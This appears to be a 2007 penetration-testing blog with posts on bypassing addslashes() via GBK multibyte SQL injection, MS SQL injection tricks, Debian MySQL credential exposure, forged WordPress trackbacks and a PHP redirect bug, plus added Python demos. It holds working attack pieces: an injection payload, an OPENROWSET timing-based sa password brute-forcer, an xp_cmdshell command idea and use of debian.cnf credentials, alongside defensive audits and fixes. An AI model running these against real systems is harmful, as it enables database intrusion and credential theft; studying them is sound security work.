SQL Injection And UTF 7 encoding

July 5, 2007 What Did I Learn Today, Research | Comments (0) sid @ 5:33 pm

Query: There is a web application vulnerable to SQL injection, but the web server has added protection like magic_quotes, or the application calls the function addslashes(), which means I can't insert a single quote and thus can't exploit the SQL injection. The injection point is in a string field. Does that mean it is safe?

Answer: To the best of my knowledge, it is safe if your application uses UTF-8 encoding (which is the most common case). However, if it supports UTF-7 encoding, it becomes vulnerable. This is best described by Chris Shiflett:

http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

"In GBK, 0xbf27 is not a valid multi-byte character, but 0xbf5c is. Interpreted as single-byte characters, 0xbf27 is 0xbf (¿) followed by 0×27 ('), and 0xbf5c is 0xbf (¿) followed by 0×5c (\).

How does this help? If I want to attempt an SQL injection attack against a MySQL database, having single quotes escaped with a backslash is a bummer. If you're using addslashes(), however, I'm in luck. All I need to do is inject something like 0xbf27, and addslashes() modifies this to become 0xbf5c27, a valid multi-byte character followed by a single quote. In other words, I can successfully inject a single quote despite your escaping. That's because 0xbf5c is interpreted as a single character, not two. Oops, there goes the backslash."

Well done, Chris.
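The bypass in the quoted text, as an added example in Python (it is not code from the original post or from Chris Shiflett's article). It implements PHP's addslashes() behaviour byte for byte, feeds it the 0xbf27 sequence, and shows what a server reading the result as GBK sees versus one reading it as UTF-8; the charset-aware escaper at the end is the approach that closes the hole. The query template, table name and user input are constructed for the demo.

```python
# Added example, not from the original post: PHP's addslashes() re-done in
# Python so the bytes can be inspected under GBK (the charset in the quoted
# text) and under UTF-8. Query template and inputs are constructed.

def addslashes(data: bytes) -> bytes:
    """Byte-oriented escaping like PHP's addslashes(): a backslash is put in
    front of every ' " \\ and NUL byte, with no knowledge of the charset."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def as_server_sees(data: bytes, charset: str) -> str:
    """Interpret bytes the way a server whose connection charset is `charset`
    would; undecodable bytes become U+FFFD instead of raising."""
    return data.decode(charset, errors="replace")


def build_query(name: bytes, charset: str) -> str:
    """Constructed vulnerable statement: the value is only addslashes()'d."""
    literal = as_server_sees(addslashes(name), charset)
    return "SELECT * FROM users WHERE name = '" + literal + "'"


def quote_survives(name: bytes, charset: str) -> bool:
    """True when a single quote that is not preceded by a backslash reaches
    the SQL parser, i.e. the string literal can be terminated early."""
    text = as_server_sees(addslashes(name), charset)
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            return True
    return False


def charset_aware_escape(data: bytes, charset: str) -> bytes:
    """The approach of a charset-aware escaper such as mysql_real_escape_string():
    decode with the connection charset first, escape characters, re-encode.
    Malformed input (0xBF 0x27 is not valid GBK) is rejected, not passed on."""
    text = data.decode(charset)  # raises UnicodeDecodeError on malformed input
    return text.replace("\\", "\\\\").replace("'", "\\'").encode(charset)


if __name__ == "__main__":
    payload = b"\xbf\x27 OR 1=1 -- "  # constructed: 0xBF 0x27 followed by the injection
    for cs in ("gbk", "utf-8"):
        print(cs, "->", build_query(payload, cs), "| quote survives:", quote_survives(payload, cs))
```

Under GBK the escaped bytes 0xbf 0x5c 0x27 decode to one CJK character followed by a bare quote, so the literal is closed and the rest of the payload becomes SQL; under UTF-8 the 0xbf byte is simply an invalid byte and the backslash still protects the quote, which is the case the answer above calls safe.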

Ten Cents

April 14, 2007 What Did I Learn Today, Research | Comments (1) admin @ 8:55 am

Some information about MS SQL Server that you may find useful when exploiting SQL injection:

Finding table names:
Do not use: SELECT name FROM sysobjects WHERE xtype = 'U'
Use: SELECT table_name FROM INFORMATION_SCHEMA.TABLES
[WHERE table_catalog = 'db_name']
[WHERE|AND table_name LIKE 'wild']
In SQL Server both queries are scoped to the current database; in INFORMATION_SCHEMA.TABLES the database is the TABLE_CATALOG column, while TABLE_SCHEMA is the schema (dbo and the like). The INFORMATION_SCHEMA form is the one to prefer because it is the portable, documented view, so the same statement also works against MySQL and PostgreSQL back ends, and it filters on the table name with LIKE. To reach the other databases the current login has access to, list them first with SELECT name FROM master..sysdatabases and then query each with a three-part name, e.g. SELECT table_name FROM other_db.INFORMATION_SCHEMA.TABLES.

Getting the current user
Use: SELECT SYSTEM_USER
Someone pointed out that SELECT USER returns the current database user name (for example dbo, the owner of the current database), which may differ from the login you are actually connected as. So SYSTEM_USER, which returns the login name, is always the correct one to use.

Brute forcing the 'sa' user's password
Use OPENROWSET: select null from openrowset('sqloledb','';'sa';'[password]','select 1;waitfor delay ''0:0:10''')

The empty data source ('') makes OPENROWSET connect to the local SQL Server, and the query 'select 1;waitfor delay ''0:0:10''' only runs if the login as sa succeeds, so a correct password shows up as a response delayed by ten seconds while a wrong one fails immediately. (On SQL Server 2005 and later this needs the 'Ad Hoc Distributed Queries' option to be enabled.) As I write this blog, I am just wondering if we can execute something like this:

select null from openrowset('sqloledb','';'sa';'[password]','exec master..xp_cmdshell ''ping my_host'''). I will confirm this sometime later.
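The timing check above, automated as an added example in Python (not code from the original post). It builds the OPENROWSET statement for each candidate password and treats a ten-second response as a hit. It assumes the tester already has some way to run a statement through the injection point and time it; run_query(sql) returning elapsed seconds is that hypothetical hook, and make_fake_server() stands in for it so the logic can be exercised offline. The candidate list and the "real" password are constructed.

```python
# Added example, not from the original post: drives the OPENROWSET / WAITFOR
# trick as a timing oracle. `execute`/`run_query` are hypothetical hooks into
# the tester's own injection tooling; make_fake_server() is a constructed stand-in.
import time

DELAY_SECONDS = 10


def tsql_literal(value: str) -> str:
    """Quote a value as a T-SQL string literal (single quotes are doubled)."""
    return "'" + value.replace("'", "''") + "'"


def openrowset_probe(password: str, delay: int = DELAY_SECONDS) -> str:
    """Build the statement from the post: an ad hoc loopback connection as sa.
    The inner query is itself a string literal, so its quotes are doubled."""
    inner = f"select 1;waitfor delay ''0:0:{delay}''"
    return (f"select null from openrowset('sqloledb','';'sa';{tsql_literal(password)},"
            f"'{inner}')")


def timed(execute):
    """Wrap a hypothetical execute(sql) callable so it returns elapsed seconds.
    A failed sa login surfaces as an error from the server, which is the fast path."""
    def run_query(sql: str) -> float:
        started = time.monotonic()
        try:
            execute(sql)
        except Exception:
            pass
        return time.monotonic() - started
    return run_query


def guess_sa_password(candidates, run_query, delay=DELAY_SECONDS, slack=1.0):
    """Return the first candidate for which the server sleeps for `delay`
    seconds, or None. Only a successful login reaches the WAITFOR."""
    for pw in candidates:
        if run_query(openrowset_probe(pw, delay)) >= delay - slack:
            return pw
    return None


def make_fake_server(real_password: str):
    """Constructed stand-in for the injection point: reports the delay the real
    server would show instead of sleeping, so the demo finishes instantly."""
    marker = ";'sa';" + tsql_literal(real_password) + ","

    def run_query(sql: str) -> float:
        return float(DELAY_SECONDS) if marker in sql else 0.05

    return run_query


if __name__ == "__main__":
    server = make_fake_server("Winter2007!")  # constructed secret
    print(guess_sa_password(["sa", "password", "Winter2007!", "admin"], server))
```

Against a live target, measure a plain query first and raise `slack` to cover network jitter; and keep the candidate list short, since every probe is a failed sa login in the server's error log.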

MySQL default [insecure] installation in Debian

April 12, 2007 What Did I Learn Today, Research | Comments (0) sid @ 6:11 pm

I recently upgraded my MySQL server and am currently running version 5.0.38-Debian_1-log. If you ever wondered how MySQL saves data on your hard disk, this is best explained here. I will quote from the same website:

“Each database is a directory, with each table stored in a separate set of files. For an individual table, the .frm file contains information about the table structure — effectively, an internal representation of the CREATE TABLE statement. The .MYD file contains the row data, and the .MYI contains any indexes belonging with this table, as well as some statistics about the table. The data file contains only row data, with minimal overhead.”

Thus if you can read these directories and files, you can get hold of the database and table names respectively. (The .MYD/.MYI pair is MyISAM's layout; the per-database directory and the .frm files exist for every storage engine, so the listing leaks names regardless of engine.)
ISSUE-1
I looked on my Debian box and these files are located in the /var/lib/mysql folder. This folder is owned by user mysql and belongs to group mysql. Surprisingly, by default the permissions on this folder are 755. Thus a normal user on the box can list files and directories in /var/lib/mysql and get hold of all the database names which the MySQL server stores on this host. However, the database directories in this folder are properly locked down, which denies an unprivileged user the table information for those databases. Although the mysql database itself allows directory listing, its files are not world readable. Thus a normal user can't read the file /var/lib/mysql/mysql/user.MYD, which holds the table mysql.user and stores the MySQL user names and password hashes. :(

ISSUE-2.0

If you find a local privilege escalation on a box and manage to get root access, how will you get hold of the data stored in the MySQL database?
You will probably try to read the file /var/lib/mysql/mysql/user.MYD to get the MySQL user names and their password hashes, and would then try to crack those hashes. It then comes down to the complexity of the password, and if the password is complex enough there is a chance that you will still not be able to crack it. However, the story is a bit different on a Debian box. Debian has a built-in account, debian-sys-maint, which by default has privileges equivalent to the MySQL root user. To make matters worse, the file /etc/mysql/debian.cnf contains the randomly generated clear-text password for this user. This file is again not world readable, but once you have root through a privilege escalation there is no need to crack any hashes; just issue the command mysql --defaults-extra-file=/etc/mysql/debian.cnf and you have the entire MySQL server to play with.
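A check for the two observations above, as an added example in Python (not code from the original post). It reports whether the datadir lets everyone list database names, whether any database directory or table file is exposed beyond that, and whether /etc/mysql/debian.cnf is readable by others, printing the debian-sys-maint login the file hands over. Paths are parameters with Debian's defaults; make_demo_layout() builds a constructed copy of the layout so the check can run on a box without MySQL.

```python
# Added example, not from the original post: permission audit for the Debian
# MySQL layout. Defaults are Debian's paths; make_demo_layout() is a constructed
# stand-in so it runs without a real server.
import configparser
import os
import stat
import tempfile


def _mode(path: str) -> int:
    return os.stat(path).st_mode


def world_listable(path: str) -> bool:
    """Directory with r and x for 'other': anyone can read its entries."""
    m = _mode(path)
    return stat.S_ISDIR(m) and bool(m & stat.S_IROTH) and bool(m & stat.S_IXOTH)


def world_readable(path: str) -> bool:
    return bool(_mode(path) & stat.S_IROTH)


def audit_mysql_host(datadir="/var/lib/mysql", debian_cnf="/etc/mysql/debian.cnf"):
    """Return (severity, message) findings; severity is info, warn or crit."""
    findings = []
    if os.path.isdir(datadir) and world_listable(datadir):
        dbs = sorted(d for d in os.listdir(datadir) if os.path.isdir(os.path.join(datadir, d)))
        findings.append(("info", f"{datadir} is listable by everyone; database names: {dbs}"))
        for db in dbs:
            dbdir = os.path.join(datadir, db)
            if not world_listable(dbdir):
                continue  # locked down: table names stay hidden from other users
            findings.append(("warn", f"{dbdir} is listable by everyone; table names of {db} exposed"))
            for name in os.listdir(dbdir):
                path = os.path.join(dbdir, name)
                if os.path.isfile(path) and world_readable(path):
                    findings.append(("crit", f"{path} is readable by everyone"))
    if os.path.isfile(debian_cnf):
        cp = configparser.ConfigParser()
        cp.read(debian_cnf)
        user = cp.get("client", "user", fallback="?")
        sev = "crit" if world_readable(debian_cnf) else "info"
        findings.append((sev, f"{debian_cnf} holds a clear-text password for {user} "
                              f"(world readable: {sev == 'crit'}); with root: "
                              f"mysql --defaults-extra-file={debian_cnf}"))
    return findings


def make_demo_layout(cnf_mode=0o600):
    """Constructed layout mirroring the defaults described in the post: datadir
    0755, the mysql database directory listable but its files 0660, an
    application database 0700, and a debian.cnf with the given mode."""
    root = tempfile.mkdtemp(prefix="mysql-audit-demo-")
    datadir = os.path.join(root, "var-lib-mysql")
    cnf = os.path.join(root, "debian.cnf")
    for d, mode in ((datadir, 0o755), (os.path.join(datadir, "mysql"), 0o755),
                    (os.path.join(datadir, "app"), 0o700)):
        os.mkdir(d)
        os.chmod(d, mode)
    for name in ("user.frm", "user.MYD", "user.MYI"):
        p = os.path.join(datadir, "mysql", name)
        open(p, "wb").close()
        os.chmod(p, 0o660)
    with open(cnf, "w") as fh:  # constructed credentials in Debian's format
        fh.write("[client]\nhost = localhost\nuser = debian-sys-maint\n"
                 "password = constructedPassword1\nsocket = /var/run/mysqld/mysqld.sock\n")
    os.chmod(cnf, cnf_mode)
    return datadir, cnf


if __name__ == "__main__":
    for severity, message in audit_mysql_host(*make_demo_layout()):
        print(severity, message)
```

Run as an ordinary user against the real paths it reproduces ISSUE-1 (the datadir listing) and reports nothing about debian.cnf beyond its mode bits; run as root it also shows the login the file contains, which is ISSUE-2.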

Abusing the Trackback utility

April 7, 2007 What Did I Learn Today, Research | Comments (1) admin @ 11:38 am

I was researching a bit into the WordPress trackback utility. This is how it works:
You submit a post with trackback URLs, and when you publish the post, WordPress sends out a request to each URL you listed as a trackback URL. Essentially this happens in the background.

You—–> Wordpress Server———->Trackback URL

The trackback request to the trackback URL is not made by your browser; it is sent by the server hosting the WordPress application. This was a bit surprising to me, as what if my WordPress hosting company does not allow outbound traffic? Anyway, the request is nothing special; it is a straightforward POST request to the trackback URL with the following parameters:

title
url
blog_name
excerpt

I wrote a simple Perl script which you can use to send fake trackback requests. Although the request will go from your IP address (unless you use an anonymous proxy), you can specify a fake URL and the other parameters, which will appear as such to the victim's WordPress. The only solution I can think of to avoid getting fake trackbacks is to check whether the submitted URL resolves to the same IP address the request came from. However, that might create some other problems.

However, I would be more interested in knowing if we can abuse it still further. At the moment I can't think of any more attack vectors to exploit this. As the connection to the trackback URL is made by the WordPress server, can we not make it connect to a malicious host? Can we not make it connect to different ports on different hosts? ... I look forward to hearing comments on this. BTW, this blog is not just about hacking WordPress :)
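The request described above and the two checks the post raises, as an added example in Python (it is not the author's Perl script and not WordPress code). build_trackback_body() and send_trackback() produce the POST with the four parameters; source_matches_url() is the receiver-side check the post suggests (does the submitted url resolve to the peer that sent the ping), and is_acceptable_target() is a sender-side guard for the "can we make it connect to a malicious host or other ports" question. Hostnames, addresses and the resolver results are constructed; a real run uses socket.gethostbyname.

```python
# Added example, not from the original post or from WordPress: a trackback
# sender plus the receiver-side and sender-side checks discussed above.
# FAKE_DNS / fake_resolve are constructed so everything runs offline.
import ipaddress
import socket
from urllib import parse, request


def build_trackback_body(title, url, blog_name, excerpt) -> bytes:
    """The form-encoded body a WordPress trackback request carries."""
    fields = {"title": title, "url": url, "blog_name": blog_name, "excerpt": excerpt}
    return parse.urlencode(fields).encode()


def send_trackback(trackback_url, title, url, blog_name, excerpt, timeout=10):
    """POST the ping. Nothing ties the values to a real post or to the
    sending host, which is why a forged ping is trivial."""
    req = request.Request(trackback_url,
                          data=build_trackback_body(title, url, blog_name, excerpt),
                          headers={"Content-Type": "application/x-www-form-urlencoded"},
                          method="POST")
    with request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read()


def source_matches_url(url, remote_addr, resolve=socket.gethostbyname) -> bool:
    """Receiver-side check suggested in the post: accept the ping only when the
    host named in `url` resolves to the address the ping came from. It breaks
    for blogs behind a CDN, on shared hosts, or sending through a proxy."""
    host = parse.urlsplit(url).hostname
    if not host:
        return False
    try:
        return resolve(host) == remote_addr
    except OSError:
        return False


def is_acceptable_target(url, resolve=socket.gethostbyname) -> bool:
    """Sender-side guard: only http(s), default ports, and public addresses,
    so the blog's server cannot be pointed at internal hosts or odd ports."""
    try:
        parts = parse.urlsplit(url)
        port = parts.port  # raises ValueError for out-of-range ports
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if port not in (None, 80, 443):
        return False
    try:
        return ipaddress.ip_address(resolve(parts.hostname)).is_global
    except (OSError, ValueError):
        return False


# constructed resolver results so the checks can run without DNS
FAKE_DNS = {"blog.example.org": "93.184.216.34", "localhost": "127.0.0.1", "intranet": "10.0.0.5"}


def fake_resolve(host: str) -> str:
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    raise socket.gaierror(f"no address for {host}")


if __name__ == "__main__":
    print(build_trackback_body("Hi", "http://blog.example.org/p/1", "My Blog", "text"))
    print(is_acceptable_target("http://intranet/", fake_resolve))
```

One caveat on the sender-side guard: it resolves the name once and the HTTP client resolves it again when connecting, so a name whose answer changes between the two lookups slips past; connecting to the checked address and sending the Host header separately closes that gap.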

Insecure PHP coding

March 20, 2007 What Did I Learn Today | Comments (4) sid @ 7:24 pm

While testing a web application today, I noticed an unusual 302 HTTP response. Normally a 302 response has just headers and no HTML body, because it is meant to redirect you to the page cited in the Location field of the HTTP header. This 302 response carried the HTML that would be presented to an authenticated admin user, but we didn't have the admin credentials. So how were we seeing this code? After analysing the 302 redirect response, we concluded that this was the result of insecure coding. The following example explains the issue in PHP.

insecure code:

<?php
session_start();
include("../config.php");
echo $loggedin; // debug output; only survives before header() when output buffering is on

if ($loggedin != "1") {
    header("Location: http://www.google.com"); /* Redirect browser */
    // no exit here, so the script carries on after setting the header
}

{
    echo "Will this code get executed?";
}
?>

In this example the statement echo "Will this code get executed?"; will indeed be executed irrespective of the value of $loggedin: header() only adds a Location header to the response, it does not stop the script, so whatever the rest of the page outputs is sent along with the 302. This is a characteristic of PHP; you won't see this behaviour in ASP.NET, where Response.Redirect() ends the response by default. To secure this code, follow this:

<?php
session_start();
include("../config.php");
echo $loggedin;

if ($loggedin != "1") {
    header("Location: http://www.google.com"); /* Redirect browser */
} else {
    echo "Will this code get executed?";
}
?>

Alternatively, this code can be secured by stopping the script right after the redirect header is set:

<?php
session_start();
include("../config.php");
echo $loggedin;

if ($loggedin != "1") {
    header("Location: http://www.google.com"); /* Redirect browser */
    die; // nothing below this line runs for an unauthenticated user
}

{
    echo "Will this code get executed?";
}
?>

It is very easy for a pentester to miss this issue, because in most cases you get redirected so fast that the page is never rendered by your browser. Unless you go through each 302 response manually, I don't think you will be able to spot it. In this case, even WebInspect wasn't able to spot it. :)
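A way to spot the symptom without reading every 302 by hand, as an added example in Python (not code from the original post). It parses raw HTTP responses, for instance saved from an intercepting proxy, and flags any 3xx whose body is more than a server's canned "document has moved" stub, which is what the missing exit after header() looks like on the wire. The three sample responses are constructed.

```python
# Added example, not from the original post: scan raw HTTP responses for a
# redirect that still carries the protected page. SAMPLE_RESPONSES are constructed.

def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return status, headers, body


INTERESTING_MARKUP = (b"<form", b"<input", b"<script", b"<table", b"<select")


def carries_real_page(body: bytes, min_body: int = 512) -> bool:
    """A correct redirect has an empty body, and a server-generated stub
    ("The document has moved here") is short and static; application content
    is larger or contains form/script markup."""
    lowered = body.lower()
    return len(body) >= min_body or any(tag in lowered for tag in INTERESTING_MARKUP)


def find_leaky_redirects(responses, min_body: int = 512):
    """Return (status, location, body_length) for each 3xx that carries a page."""
    hits = []
    for raw in responses:
        status, headers, body = parse_response(raw)
        if 300 <= status < 400 and carries_real_page(body, min_body):
            hits.append((status, headers.get("location"), len(body)))
    return hits


SAMPLE_RESPONSES = [
    # constructed: a correct redirect, nothing after the headers
    b"HTTP/1.1 302 Found\r\nLocation: http://www.google.com\r\nContent-Length: 0\r\n\r\n",
    # constructed: a web server's canned redirect page, harmless
    b"HTTP/1.1 302 Found\r\nLocation: http://example.test/login\r\nContent-Type: text/html\r\n\r\n"
    b"<html><head><title>302 Found</title></head><body><h1>Found</h1>"
    b"<p>The document has moved <a href=\"http://example.test/login\">here</a>.</p></body></html>",
    # constructed: the bug from the PHP example, the admin page rides along with the redirect
    b"HTTP/1.1 302 Found\r\nLocation: http://www.google.com\r\nContent-Type: text/html\r\n\r\n"
    b"<html><body><h1>Admin console</h1><form action=\"adduser.php\" method=\"post\">"
    b"<input name=\"user\"><input name=\"pass\" type=\"password\"><input type=\"submit\"></form>"
    b"<a href=\"users.php\">Manage users</a></body></html>",
]

if __name__ == "__main__":
    for hit in find_leaky_redirects(SAMPLE_RESPONSES):
        print("redirect with body:", hit)
```

The size threshold and the markup list are heuristics; tune them to the server in front of the application, since the canned stub's size differs between Apache, IIS and nginx.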